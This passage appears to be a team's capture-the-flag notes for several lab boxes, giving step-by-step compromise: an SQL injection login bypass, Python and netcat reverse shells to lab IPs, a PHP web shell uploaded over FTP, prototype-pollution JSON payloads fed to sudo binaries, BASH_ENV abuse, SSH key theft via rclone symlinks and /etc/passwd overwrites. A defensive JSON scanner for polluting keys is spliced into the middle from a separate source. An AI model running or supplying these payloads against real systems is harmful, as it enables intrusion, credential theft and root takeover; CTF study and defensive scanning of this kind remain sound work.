sudo /usr/local/bin/zaj /tmp/evil.json
```
#### Chatgpt
```bash
# create payload
cat > /tmp/payload.sh <<'EOF'
#!/bin/sh
# create a suid-root copy of /bin/bash (common CTF escalation)
cp /bin/bash /tmp/rootbash
chown root:root /tmp/rootbash
chmod 4755 /tmp/rootbash
# optional: touch a flag so we know it ran
echo "pwned by zaj exploit" > /tmp/zaj_pwned
EOF
chmod +x /tmp/payload.sh
ls -l /tmp/payload.sh
```
```bash
cat > /tmp/evil.json <<'EOF'
{"constructor":{"prototype":{"authorized":true,"username":"root","command":"/tmp/payload.sh"}}}
EOF
# inspect
cat /tmp/evil.json
sudo /usr/local/bin/zaj /tmp/evil.json
```
## SrRequiem Notes
### judgedread
Login SQLi
`username=tunas@email.com&password=' OR 1=1-- -`
admin pass:
random-password
PREFERABLY USE A PYTHON SHELL FOR EVERYTHING
https://github.com/Axiba55/cve_report/blob/main/judging-management-system/RCE-1.md
Priv:
```bash
#priv.sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.82",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
```
```bash
sudo /usr/local/bin/mutator '{"__proto__":{"CVE":["CVE-0001-0001",""],"poc":["","bash /tmp/priv.sh"]}}'
```
### blobbuster
ref:
https://github.com/charmbracelet/vhs
for privesc
create poc.tape
```
# Where should we write the GIF?
Output demo.gif
# Set up a 1200x600 terminal with 46px font.
Set FontSize 46
Set Width 1200
Set Height 600
# Type a command in the terminal.
Type "echo 'Welcome to VHS!';nc -e /bin/bash 10.10.2.30 5555;"
# Pause for dramatic effect...
Sleep 1000ms
# Run the command by pressing enter.
Enter
# Admire the output for a bit.
Sleep 5s
```
send it over ssh
```bash
ssh 10.0.6.3 -p 1976 < poc.tape > demo.gif
```
have a listener ready to run a quick command
add our public ssh key to authorized_keys
`ssh ETSCTF@....`
for priv esc
there is `sudo -l`
```bash
cat > /tmp/malicious.sh <<'EOF'
#!/bin/sh
echo "pwned by root" > /tmp/root_file
chmod 600 /tmp/root_file
EOF
chmod +x /tmp/malicious.sh
echo 'ENV=/tmp/malicious.sh' > /tmp/.env
echo 'BASH_ENV=/tmp/malicious.sh' > /tmp/.env
sudo /usr/local/bin/dotenvecho
bash -p
```
### syncropwn
admin:admin1234
https://github.com/kimai/kimai/security/advisories/GHSA-fjhg-96cp-6fcw
Copy the contents of `/etc/passwd` into priv.json:
```json
{"__proto__":{"admin":true,"file":"/etc/passwd","contents":"root:$1$O4uAOCjg$LMyJyf5DqRgDRDNpI7oLV1:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n..."}}
```
```
sudo /usr/local/bin/ali ./priv.json
su -
Password: srrequiem
```
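Defensive counterpart, added here and not from the original notes or any of the tools named in them: a loader that parses untrusted JSON strictly and flags the key shapes these privesc inputs rely on (`__proto__` anywhere, and `constructor` wrapping a `prototype` object), as seen in the json-extender, zaj, mutator and ali steps above; the same walk applies to a parsed YAML document like the yml2json one. The samples are constructed to match those shapes.

```python
import json


def find_polluting_keys(node, path="$"):
    """Return JSONPath-style locations of keys a Node-style deep merge would
    treat as the prototype: any "__proto__" key, and a "constructor" key whose
    value is an object that itself carries "prototype"."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            if key == "__proto__":
                hits.append(here)
            elif key == "constructor" and isinstance(value, dict) and "prototype" in value:
                hits.append(f"{here}.prototype")
            hits.extend(find_polluting_keys(value, here))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_polluting_keys(value, f"{path}[{i}]"))
    return hits


def _strict_pairs(pairs):
    # object_pairs_hook: reject duplicate keys instead of keeping the last one,
    # so a second "__proto__" copy cannot slip past a check that saw only the first
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def scan_json_text(text: str) -> list:
    """Parse strictly and return the polluting key locations (empty list if clean)."""
    return find_polluting_keys(json.loads(text, object_pairs_hook=_strict_pairs))


def is_acceptable_json(text: str) -> bool:
    """False for malformed input, duplicate keys, or any polluting key."""
    try:
        return not scan_json_text(text)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return False


# Constructed samples shaped like the privesc inputs in these notes.
SAMPLES = {
    "json-extender": '{"__proto__": {"user": "../..", "file": "root/.ssh/id_rsa"}}',
    "zaj": '{"constructor":{"prototype":{"authorized":true,"username":"root"}}}',
    "mutator": '{"__proto__":{"CVE":["CVE-0001-0001",""],"poc":["",""]}}',
    "benign": '{"name": "demo", "constructor": "Ford", "tags": ["a", "b"]}',
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, scan_json_text(text))
```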
### scamcart
web.inc.php
FTP login
anonymous:anonymous
put web.inc.php
```php
<?php system('nc -e /bin/bash 10.10.2.30 5555'); ?>
```
path traversal RCE
`http://10.0.2.2/admin.php?_g=../../../../../../../..//srv/ftp&node=web`
https://sploitus.com/exploit?id=1B6729B3-33C5-558E-93A3-E8D28D1C4E67
priv esc
there is a cron copying into root's authorized_keys
put our public key in /tmp/key.pub and do the PATCH
https://github.com/advisories/GHSA-xg8v-m2mh-45m6
```bash
curl -v -X PATCH "http://127.0.0.1:3000/files/7ea5108cd722++940aea8d-c79b-490a-8796-a6e6dacbbe46" -H "Tus-Resumable: 1.0.0" -H "Upload-Offset: 0" -H "Content-Type: application/offset+octet-stream" --data-binary @/tmp/key.pub
```
with pspy, confirm when the cron runs, then `ssh root@ip`
pwned
### sheetshow
```bash
# with python2
pip install alluxio
```
```python
import alluxio
client = alluxio.Client('server', 39999)
client.mount('/fs', '/root')
with client.open('/fs/.ssh/id_rsa', 'r') as f:
    print f.read()
```
```bash
ssh root@server -i id_rsa
```
## Th3d00msl4y3r Notes
### llmisery
### escapist
### scrumurai
create another admin user
and inside it upload an attachment
in projects - upload the .php directly
/upload/attachements/file.php
with rclone: Version "v1.68.1"
privesc: first move to ETSCTF by pulling out the id_rsa
for root, copy a modified passwd and use "su" to become root with a custom password
example passwd, the password is -> kd3n4
```
root:$1$kd3n4$5P7sUTeqttfdak/c/wnzx/:0:0:root:/root:/bin/bash
```
```bash
mkdir -p /tmp/home
mkdir -p /tmp/home_new
ln -s /home/ETSCTF/.ssh/id_rsa /tmp/home/id_rsa
sudo -u ETSCTF /usr/bin/rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG
```
```
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
```
```bash
wget 10.10.2.30:8000/passwd
sudo /usr/bin/rclone copy /tmp/passwd /etc/ --ignore-times --log-level=DEBUG
```
...